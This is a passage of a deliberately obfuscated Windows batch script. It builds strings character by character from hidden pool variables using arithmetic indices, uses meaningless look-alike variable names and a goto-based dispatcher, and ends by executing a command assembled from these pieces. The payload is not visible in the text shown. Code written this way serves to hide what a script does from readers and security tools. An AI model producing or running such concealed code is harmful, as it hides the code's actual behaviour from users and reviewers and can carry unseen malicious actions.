for /f "tokens=2 delims==" %%I in ('set v_i__O0IO0') do call set "v_l_I0__OIllOl=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lIIO000_ll=!v_l_I0__OIllOl!"
set /a "v_i__l_l0O=(54-7)"
set "v_p_II00l_lIIO=v_l_OOI000O_OO"
for /f "tokens=2 delims==" %%I in ('set v_i__l_l0O') do for /f "delims=" %%A in ("!v_p_II00l_lIIO!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_II0IOOIIll=!v_l_OOI000O_OO!"
set /a "v_i_l__0lO=((55-20)+(6-6))"
for /f "tokens=2 delims==" %%I in ('set v_i_l__0lO') do call set "v_l_O00l_O_I00=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lIlO_lI0_O=!v_l_O00l_O_I00!"
set /a "v_i_Il0OI_=(((((28+24)-47)*6)+2)+(21-21))"
for /f "tokens=2 delims==" %%I in ('set v_i_Il0OI_') do call set "v_l_I0IlOIlOII=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_OOI0000_lI=!v_l_I0IlOIlOII!"
set /a "v_i_OOO_lO=((36+20)+(13-13))"
set "v_p_l_OlIll__O=v_l__IOOlII_OO"
for /f "tokens=2 delims==" %%I in ('set v_i_OOO_lO') do for /f "delims=" %%A in ("!v_p_l_OlIll__O!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__I_lll00_0=!v_l__IOOlII_OO!"
set /a "v_i_O0IOlI=((1*5)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0IOlI') do call set "v_l_I_l0IO_0_I=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lO_O0I_lII=!v_l_I_l0IO_0_I!"
set /a "v_i__l___l=((34-21)+(18-18))"
set "v_p_O0lIIlIOIl=v_l_O_II_0OOll"
for /f "tokens=2 delims==" %%I in ('set v_i__l___l') do for /f "delims=" %%A in ("!v_p_O0lIIlIOIl!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_l0O0IO___0=!v_l_O_II_0OOll!"
set /a "v_i_O_0llO=((((22+33)-25)+21)+(2-2))"
for /f "tokens=2 delims==" %%I in ('set v_i_O_0llO') do call set "v_l_OlI_OOI_O_=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_I_I0O0O00_=!v_l_OlI_OOI_O_!"
set /a "v_i_lII_00=(((-32+26)+6)*4)"
for /f "tokens=2 delims==" %%I in ('set v_i_lII_00') do call set "v_l_IIO0lI0Il0=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_l0l_l_lO0l=!v_l_IIO0lI0Il0!"
set /a "v_i_l0lOlO=(((44-16)+35)-7)"
for /f "tokens=2 delims==" %%I in ('set v_i_l0lOlO') do call set "v_l_O_Il_0OO_l=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_OI_I_O0O0O=!v_l_O_Il_0OO_l!"
set /a "v_i_O_OIll=((27*3)-30)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_OIll') do call set "v_l__00lll_I0O=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_ll00l_0_OI=!v_l__00lll_I0O!"
call !m_I_0lIl_l0l! "v_f_O_IIII0_lI_0="!v_c_O0I_0I__0_!="
call !m_I_0lIl_l0l! "v_f_lIlO0Ol___0_=!v_c_Ill0_OI0O0!,!v_c_l_llOOOII_!"
call !m_I_0lIl_l0l! "v_f_OlIl0IO0OO_0=!v_c_O0IO0IIlI_!!v_c_l_llOOOII_!"
set "v_s__O_OO_IlI0=!v_l__O0I_lI00O!"
:L_DISPATCH
for /f "delims=" %%A in ("!v_s__O_OO_IlI0!") do goto :%%A
:LB_EXIT_I_ll__l0
exit /b
:_O_lIl_IOl__
for /f "delims=" %%A in ("!p2__OI___l_O_!") do for /f "delims=" %%B in ("!%%A!") do for /f "delims=" %%C in ("!%%B!") do %%C  !v_f_O_IIII0_lI_0!!v_c_lIIO000_ll!!v_c_OOO0_l_Il0!!v_c_lII_0l_IO_!!v_c_O_lI0__O0O!!v_c_III0l____l!"
f^or !v_c_O0000II_II!!v_c__OOl0OIl0O! %%A in (!v_f_lIlO0Ol___0_!,!v_c_l_llOOOII_!) do call !m_I_0lIl_l0l! "!v_c_O0I_0I__0_!=%!v_c_____0OIIII!!v_c_O0lO_I00II!!v_f_OlIl0IO0OO_0!%%V!v_c_llIllO0__0!!v_c_O0IO0IIlI_!!v_c_l_l0lllOlO!,!v_c_l_llOOOII_!%"
call !m_I0Il0_O0lI! %V%
call !m_I_0lIl_l0l! "v_s__O_OO_IlI0=!v_l_II0I0_Il0I!"
goto :L_DISPATCH
